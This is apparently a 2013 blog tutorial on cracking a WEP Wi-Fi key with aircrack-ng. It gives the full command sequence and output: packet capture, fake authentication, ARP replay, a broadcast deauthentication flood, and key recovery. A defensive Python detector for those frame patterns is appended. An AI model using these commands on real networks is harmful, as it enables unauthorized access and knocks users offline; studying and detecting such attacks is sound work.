AirCrack-ng Step by Step To Crack WEP

Cracking WEP is simple and the attack is old; I just wanted to document it.

  1. Step 1 is to put our Wi-Fi card into monitor mode so we can start sniffing traffic. We do this with airmon-ng.
    root@KaliPi:~# airmon-ng start wlan0
    
    Found 3 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    -e
    PID     Name
    1616    dhclient
    2252    wpa_supplicant
    2295    dhclient
    Process with PID 2252 (wpa_supplicant) is running on interface wlan1
    Process with PID 2295 (dhclient) is running on interface wlan1
    
    Interface       Chipset         Driver
    
    wlan0           Atheros AR9271  ath9k - [phy1]
                                    (monitor mode enabled on mon0)
    wlan1           Realtek RTL8187L        rtl8187 - [phy0]
  2. The next step is to start airodump-ng to figure out which Wi-Fi network we want to go after (your own… RIGHT?).
    root@KaliPi:~# airodump-ng mon0
     CH  8 ][ Elapsed: 4 s ][ 2013-11-15 14:30
    
     BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
    
     00:00:00:00:00:01   -1        2        0    0   6  54 . OPN              asdf1
     00:00:00:00:00:02  -48       11       64   31   6  54e  WPA2 CCMP   PSK  asdf2
     00:00:00:00:00:03  -49        2        0    0   6  54e. WEP  WEP         asdf3
     00:00:00:00:00:04  -52        8        0    0   6  54e. WPA  TKIP   PSK  asdf4
     00:00:00:00:00:05  -54        3        0    0   6  54e. WEP  WEP         asdf5
     00:00:00:00:00:06  -55        2        0    0   6  54e. WEP  WEP         asdf6
     00:00:00:00:00:07  -56        6        0    0   6  54e. WEP  WEP         asdf7
  3. Since we’re doing an example of hacking WEP, we’ll pick MY Personally OWNED asdf3 (name obscured). Now we need to set airodump-ng to write our packets to a file and ONLY focus on that one AP. We want to be precise with this, as any bad packets that get recorded in our packet file will break aircrack-ng.
    airodump-ng --ivs -w asdf3 --bssid 00:00:00:00:00:03 --channel 6 -a mon0
  4. Now we need a second window open. We first need to authenticate to the network using aireplay-ng. After the first successful association, you can cancel the command.
    root@KaliPi:~# aireplay-ng --fakeauth 6000 -o 1 -q 10 -a 00:00:00:00:00:03 mon0
    No source MAC (-h) specified. Using the device MAC (02:10:CD:A7:0B:44)
    14:40:59  Waiting for beacon frame (BSSID: 00:00:00:00:00:03) on channel 6
    
    14:40:59  Sending Authentication Request (Open System) [ACK]
    14:40:59  Authentication successful
    14:40:59  Sending Association Request [ACK]
    14:40:59  Association successful 🙂 (AID: 1)
    
    14:41:04  Sending keep-alive packet [ACK]
    14:41:14  Sending keep-alive packet [ACK]
    14:41:24  Sending keep-alive packet [ACK]
  5. Next we need to start mass-producing ARP requests (which give us new IVs) via aireplay-ng. What we want to see is the “got ## ARP requests” number go crazy. If it doesn’t, and sits at a low number for a few minutes, check the sub-bullet below.
    root@KaliPi:~# aireplay-ng --arpreplay -b 00:00:00:00:00:03 mon0
    No source MAC (-h) specified. Using the device MAC (02:10:CD:A7:0B:44)
    14:43:37  Waiting for beacon frame (BSSID: 00:00:00:00:00:03) on channel 6
    Saving ARP requests in replay_arp-1115-144337.cap
    You should also start airodump-ng to capture replies.
    Read 1034 packets (got 66 ARP requests and 91 ACKs), sent 257 packets...(499 pps)
    Read 1103 packets (got 86 ARP requests and 110 ACKs), sent 307 packets...(499 pps)
    Read 1198 packets (got 102 ARP requests and 127 ACKs), sent 357 packets...(499 pps)
    Read 1332 packets (got 141 ARP requests and 165 ACKs), sent 407 packets...(499 pps)
    Read 1466 packets (got 175 ARP requests and 203 ACKs), sent 458 packets...(500 pps)
    Read 1620 packets (got 224 ARP requests and 242 ACKs), sent 507 packets...(499 pps)
    Read 1757 packets (got 257 ARP requests and 277 ACKs), sent 558 packets...(500 pps)
    Read 1898 packets (got 306 ARP requests and 320 ACKs), sent 607 packets...(499 pps)
    Read 2038 packets (got 345 ARP requests and 357 ACKs), sent 658 packets...(500 pps)
    Read 2164 packets (got 391 ARP requests and 392 ACKs), sent 708 packets...(500 pps)
    • To help generate packets, we can send out a deauthentication packet. This will tell every computer on the network to sign off (and then they will automatically sign right back on). This will help to start generating some traffic.
      root@KaliPi:~# aireplay-ng --deauth 5 -a 00:00:00:00:00:03 mon0
      14:52:03  Waiting for beacon frame (BSSID: 00:00:00:00:00:03) on channel 6
      NB: this attack is more effective when targeting
      a connected wireless client (-c <client's mac>).
      14:52:04  Sending DeAuth to broadcast -- BSSID: [00:00:00:00:00:03]
      14:52:04  Sending DeAuth to broadcast -- BSSID: [00:00:00:00:00:03]
      14:52:05  Sending DeAuth to broadcast -- BSSID: [00:00:00:00:00:03]
      14:52:05  Sending DeAuth to broadcast -- BSSID: [00:00:00:00:00:03]
      14:52:06  Sending DeAuth to broadcast -- BSSID: [00:00:00:00:00:03]
  6. Next we’ll want to actually start cracking the saved IVs file. Usually 5,000-10,000 IVs are required. It’s safe to start aircrack-ng pretty soon after aireplay-ng, as aircrack-ng will reload the file every ~5,000 new IVs.
    root@KaliPi:~# aircrack-ng asdf3-01.ivs
    Opening asdf3-01.ivs
    Read 22068 packets.
    
       #  BSSID              ESSID                     Encryption
    
       1  00:00:00:00:00:03  asdf3                     WEP (22067 IVs)
    
    Choosing first network as target.
    
    Opening asdf3-01.ivs
    Attack will be restarted every 5000 captured ivs.
    Starting PTW attack with 24640 ivs.
                             KEY FOUND! [ AA:AA:AA:AA:AA ]
            Decrypted correctly: 100%
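A defender-side check for the traffic that step 5 produces, added here as an example and not part of the original post: it parses raw 802.11 headers and flags a broadcast deauthentication flood and a storm of identical protected data frames (the replayed ARP requests), the two signatures a wireless IDS would watch for. The frames, the MAC addresses (reused from the post's placeholders) and the thresholds are constructed assumptions.

```python
"""Wireless-IDS heuristics for the two aireplay-ng behaviours shown in step 5:
a broadcast deauth flood and an ARP-request replay storm. Frames are
constructed inline (nothing is captured or sent); thresholds are assumptions."""
from collections import Counter

BROADCAST = "ff:ff:ff:ff:ff:ff"
mac = lambda b: ":".join(f"{x:02x}" for x in b)
unmac = lambda s: bytes(int(x, 16) for x in s.split(":"))

def parse_frame(raw):
    """Decode the 24-byte 802.11 MAC header; which address is the BSSID depends on To/From DS."""
    ftype, subtype = (raw[0] >> 2) & 0x3, raw[0] >> 4
    to_ds, from_ds = raw[1] & 0x1, raw[1] & 0x2
    a1, a2, a3 = mac(raw[4:10]), mac(raw[10:16]), mac(raw[16:22])
    bssid = a1 if to_ds and not from_ds else a2 if from_ds and not to_ds else a3
    return {"type": ftype, "subtype": subtype, "addr1": a1, "addr2": a2,
            "bssid": bssid, "protected": bool(raw[1] & 0x40), "body": raw[24:]}

def analyze(frames, deauth_threshold=10, replay_threshold=20):
    """Return alerts for one capture interval (assume the list spans about one second)."""
    deauths, bodies = Counter(), Counter()
    for f in map(parse_frame, frames):
        if f["type"] == 0 and f["subtype"] == 12:      # management frame, deauthentication
            deauths[(f["bssid"], f["addr1"] == BROADCAST)] += 1
        elif f["type"] == 2 and f["protected"]:        # WEP/WPA-protected data frame
            bodies[(f["bssid"], f["addr2"], f["body"])] += 1
    alerts = []
    for (bssid, bcast), n in deauths.items():
        if n >= deauth_threshold:   # an AP almost never kicks clients in bulk
            alerts.append(("DEAUTH_FLOOD", bssid, "broadcast" if bcast else "unicast", n))
    for (bssid, sa, _), n in bodies.items():
        if n >= replay_threshold:   # same IV + ciphertext repeated: a replay, not a retry
            alerts.append(("REPLAY_STORM", bssid, sa, n))
    return alerts

def deauth_frame(bssid, dst, reason=7):
    # FC 0xc0 = mgmt/deauth, flags 0, duration; addr1=DA, addr2=SA, addr3=BSSID; seq; reason code
    return b"\xc0\x00\x3a\x01" + unmac(dst) + unmac(bssid) * 2 + b"\x00\x00" + reason.to_bytes(2, "little")

def wep_data_frame(bssid, src, body):
    # FC 0x08 = data, flags 0x41 = To-DS + Protected; addr1=BSSID, addr2=SA, addr3=DA; seq; body
    return b"\x08\x41\x00\x00" + unmac(bssid) + unmac(src) + unmac(BROADCAST) + b"\x00\x00" + body

AP, CLIENT = "00:00:00:00:00:03", "02:10:cd:a7:0b:44"   # placeholders reused from the post
SAMPLE = ([deauth_frame(AP, BROADCAST)] * 64                                 # --deauth burst
          + [wep_data_frame(AP, CLIENT, b"\x11\x22\x33\x00" + b"\xab" * 36)] * 30  # replayed ARP
          + [wep_data_frame(AP, CLIENT, bytes([i, 0, 0, 0]) + bytes(36)) for i in range(5)])  # normal
if __name__ == "__main__":
    for alert in analyze(SAMPLE):
        print(*alert)
```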
